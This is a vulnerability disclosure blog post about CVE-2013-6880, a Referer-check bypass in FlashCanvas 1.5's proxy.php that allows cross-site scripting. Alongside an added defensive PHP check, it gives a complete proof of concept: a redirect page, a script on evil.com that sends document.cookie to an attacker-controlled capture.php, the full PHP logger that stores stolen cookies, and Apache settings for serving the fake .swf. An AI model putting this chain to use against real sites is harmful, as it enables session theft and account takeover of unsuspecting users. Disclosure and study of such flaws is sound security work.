Marc Wickenden recently discovered a security issue within FlashCanvas 1.5 that could lead to a number of problems, such as cross-site scripting. The issue has been assigned CVE-2013-6880 and the vendor has now released a fix for the issue, which can be found here. In this blog post we take a closer look at the issue and the proof of concept that shows how this issue can be used to steal session tokens.
Vulnerable code
The issue exists because the proxy.php script does not adequately verify the Referer header before requesting (via curl) the remote URL specified in the ‘url’ GET parameter and rendering it.
Within the proxy.php file the offending code is:
if (!preg_match('#/flash\d*canvas\.swf$#', $_SERVER['HTTP_REFERER'])) {
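The regular expression above only inspects the end of the Referer path, so any host that serves a page whose path ends in /flashcanvas.swf satisfies it. The following is an added example of a stricter check, written for this post and not FlashCanvas's own code nor the vendor's published fix: it requires the Referer host to match the host proxy.php is served from and, separately, restricts the proxied ‘url’ parameter to an allow-list of hosts. The function names and the allow-list value are assumptions.

```php
<?php
// Added example: a defensive replacement for the Referer-only check in proxy.php.
// Not the project's code. Function names and the allow-list are assumptions.

// True only when the Referer is on the same host as this script AND its path
// still ends in /flashcanvas.swf (the original, path-only condition).
function referer_is_same_origin($referer, $ownHost)
{
    $parts = parse_url($referer);
    if ($parts === false || !isset($parts['host']) || !isset($parts['path'])) {
        return false;
    }
    // HTTP_HOST may carry a :port suffix; drop it before comparing hosts.
    $ownHost = strtolower(preg_replace('/:\d+$/', '', $ownHost));
    $host = strtolower($parts['host']);
    return $host === $ownHost
        && preg_match('#/flash\d*canvas\.swf$#', $parts['path']) === 1;
}

// True only for http(s) URLs whose host is on the allow-list. This is the
// control that actually matters: the Referer is supplied by the browser, and a
// proxy that will fetch and render any URL is an open proxy regardless of it.
function url_is_allowed($url, array $allowedHosts)
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme']) || !isset($parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), array('http', 'https'), true)) {
        return false;
    }
    return in_array(strtolower($parts['host']), $allowedHosts, true);
}

// How proxy.php would use the two checks (hypothetical allow-list; a real
// deployment lists only the hosts the canvas actually needs to load from).
$allowedHosts = array('www.target.com');   // constructed value
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
$ownHost = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '';
$url     = isset($_GET['url']) ? $_GET['url'] : '';

if (!referer_is_same_origin($referer, $ownHost) || !url_is_allowed($url, $allowedHosts)) {
    header('HTTP/1.1 403 Forbidden');
    exit;
}
// ... existing curl fetch of $url continues here ...
```

With this in place the delivery.com page described below fails the first check (its host is not the target's), and even a Referer that somehow passed would still be stopped by the allow-list, since evil.com is not on it. The same-host comparison does mean clients that strip the Referer header are refused, which is the trade-off for not trusting a path suffix alone.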
Creating the exploit
In order to exploit this issue the user needs to already be logged in to the target site, and the attacker needs control of a website that can serve a page ending in /flashcanvas.swf.
Our malicious /flashcanvas.swf makes a call to the vulnerable proxy.php on the remote site. An attacker entices a victim user to click on a malicious link. This makes a request, for example via a redirect, to the vulnerable proxy.php at the target site with the Referer set to a passable value. The proxy.php fetches the requested target URL and renders this in the context of the target site. Page rewrite, script execution, you name it, it becomes possible from this point.
POC
We have generated a POC to prove this and can use the flaw to steal session cookies of a victim under the following scenario. In order to exploit this issue the attacker needs control of a website (let's call this delivery.com) that can serve a page ending in /flashcanvas.swf.
We then use the following code to make a call to the vulnerable proxy.php on the remote site (let's call this target.com) and redirect the user to our evil site (evil.com). We used a completely separate host in order to ensure this was cross-domain.
On delivery.com we need the following:
-- flashcanvas.swf
<!DOCTYPE html>
<html>
<head>
<title>CVE 2013 6880 POC</title>
<meta http-equiv="refresh" content="1;http://www.target.com/FlashCanvas/proxy.php?url=http://evil.com/xss.html">
</head>
<body>
<p>Redirecting...</p>
</body>
</html>
--
On the evil.com site our script looks like this:
<script>location.href = 'http://delivery.com/capture.php?cookie='+document.cookie;</script>
The capture.php file on delivery.com is used to record and print out the information sent to the page. It is also included in the access logs of course. For completeness the capture.php is:
<?php
// Append every hit to a per-day file in /tmp, prefixed with a timestamp and the client IP
$date = date("dmY");
$timestamp = date("D M j G:i:s T Y");
$collectionfile = "/tmp/collection.$date";
$fh = fopen($collectionfile, "a");
$ip = $_SERVER['REMOTE_ADDR'];
fwrite($fh, "== $timestamp / $ip ==\n");
?>
<html>
<body>
<?php
if (isset($_GET)) {
    fwrite($fh, "== GET ==\n");
    foreach ($_GET as $k => $v) {
        // document.cookie arrives as "name=value; name2=value2", so split it for display
        $arr = explode(";", $v);
        foreach ($arr as $vv) {
            $vals = explode("=", $vv);
            print "<p>$vals[0]: $vals[1]</p>";
        }
        fwrite($fh, "$k:$v\n");
    }
}
if (isset($_POST)) {
    fwrite($fh, "== POST ==\n");
    foreach ($_POST as $k => $v) {
        fwrite($fh, "$k:$v\n");
        print "$k: $v\n";
    }
}
fclose($fh);
?>
</body>
</html>
Summary
In summary, an attacker entices a victim user to click on the malicious link (http://delivery.com/flashcanvas.swf). This makes a request (in our case via a redirect) to the vulnerable proxy.php at the target site with the Referer set to a passable value. The proxy.php fetches the requested target URL (http://evil.com/xss.html) and renders this in the context of the target.com site, including script execution and DOM functionality.
Note
By default, under Apache the .swf extension will be served as Shockwave Flash. We require this to be served as a page, so this requires the following configuration changes on the evil.com webserver:
Comment out the following line in /etc/mime.types:
#application/x-shockwave-flash swf swfl
In your Apache configuration, edit the file /etc/apache2/mods-enabled/mime.conf and add:
AddType text/html .swf
Don't forget to reload Apache.